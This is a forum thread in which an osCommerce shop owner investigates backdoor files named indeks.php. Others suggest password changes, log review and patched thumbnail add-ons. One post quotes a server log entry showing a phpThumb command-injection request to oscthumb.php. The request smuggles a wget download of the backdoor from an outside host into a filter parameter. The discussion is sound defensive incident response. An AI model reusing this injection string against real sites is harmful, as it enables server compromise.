indeks.php and indeks.php1

[♥altoid]

this morning site monitor on a 2.2 shop of mine showed two new files...indeks.php and indeks.php1

 

they were put their sometime since yesterday am and when the site monitor cron ran this am.

 

they were located in the root/public_html folder, same level as index.php

 

the files showed base64 code within and upon converting, it's it had something to do with email hacking or so it appears to me.

 

all else seems fine on that shop.

 

i deleted those files

 

googling their names didn't give me much info.

 

does any one know anything about these files etc. just curious.

 

thanks

[Guest]

@@altoid

 

Secure your site ! Your server, change all usernames and passwords.

 

 

 

Chris

[Taipo]

In many cases, those files appear via a server wide hack (i.e. a backdoor script such as this is dropped in the root of every site on a server). Contact your web service provider and ask them have their servers been compromised recently. Many providers keep a tight lip on these issues and prefer to lay the blame with the user.

[♥altoid]

@@DunWeb

Thanks Chris...changed admin user name / pwd but due to a "front page" extension issue the admin folder password protection is a problem.. the host is working on that.

 

first time ever this shop has been compromised...it's an older 2.2 shop and really needs to be brought up to 2.3.3. i just need to tackle that and get a more secure php version to cover it.

 

@@Taipo

the host says negative on server wide issues, but they did have a huge nasty server wide issue a couple years back changing all the index files to a hacked file

thanks

[Jack_mcs]

@@altoid FrontPage extensions are no longer supported by MicroSoft so any security issues will not be fixed. You should ask your host to remove that option. The reason you can't change the password is probably because cPanel, assuming that is what your host uses, won't let you do that if it sees something to do with Frontpage in the .htaccess file. If you delete such entries, it should work. You can then add them back in if needed.

 

For the index files, if it is not too late, you can look in the servers ftp log to get the IP of whoever uploaded those. Your host may have to provide the log if you don't have access to it.

[♥altoid]

@@Jack_mcs

 

Jack, the particular snafu with MS front page extensions, on my host anyway, is that they would not remove via the CP, nor my VPS WHM panels. Tech support had to do the removal and they just finished up, so now I can work with the protected folders in the 2.2 shops.

 

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two.

 

Thanks

[Jack_mcs]

@@Jack_mcs

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two.

LOL.

[♥altoid]

reviewing the log file...the first instance of indeks.php is this:

 

41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"

 

then later in the log there are 6 instances of

GET /indeks.php from the same ip

 

which has now been banned from my site

 

so my question is what is the oscthumb involvement here?

[Jack_mcs]

Is file.jpg a real image? Maybe the hacker uploaded that file at some point and it has hacker code in it. You may also want to look in the Path Tracker report for that IP and see what he was doing. It might show something.

[♥altoid]

@@Jack_mcs

path tracker for that ip showed this:

2013-04-28 18:37:59 product_info.php products_id=482

 

pid 482 is a legit product in the shop.

 

searching site...no file.jpg

 

looking here: http://labs.sucuri.net/?details=picasa.com.playteck.net

 

i find:

 

Details for the domain picasa.com.playteck.net

 

URLs and sub domains distributing the malware or acting as a redirector:

 

Blacklist status

 

Blacklist status for picasa.com.playteck.net: http://labs.sucuri.net/?blacklist=picasa.com.playteck.net

IP address information

 

Domain picasa.com.playteck.net is at: 67.55.40.35 (67.55.40.35)

ip info for that is:

 

IP address : 67.55.40.35

Country : CA

State/Province : ONTARIO

City : MISSISSAUGA

Zip or postal code : L4X 2Z3

 

i ran a site scan using sucuri.net and it came back clean.

 

same test through comodo came back clean

[burt]

Interesting. I wonder if oscthumb is vulnerable ?

[♥altoid]

@@burt

i'm running rob's kiss thumbnailer on my 2.3.3 shops .... which is where this 2.2 shop is headed. :-

[♥mattjt83]

@@altoid

@@burt

 

It looks like oscthumb runs phpThumb which is vulnerable.

 

This looks like what Steve posted from the exploit on his site:

http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

 

I haven't tested this version but they are claiming it is updated to a more secure version of phpThumb: http://addons.oscommerce.com/info/5491

[♥altoid]

@@mattjt83

 

Thanks Matt, I wasn't aware of that add on to address the vulnerability issue.

 

I am going to try that on an existing 2.2 shop, and then for another shop upgrade I opted to go with Robert's KISS Thumb add on.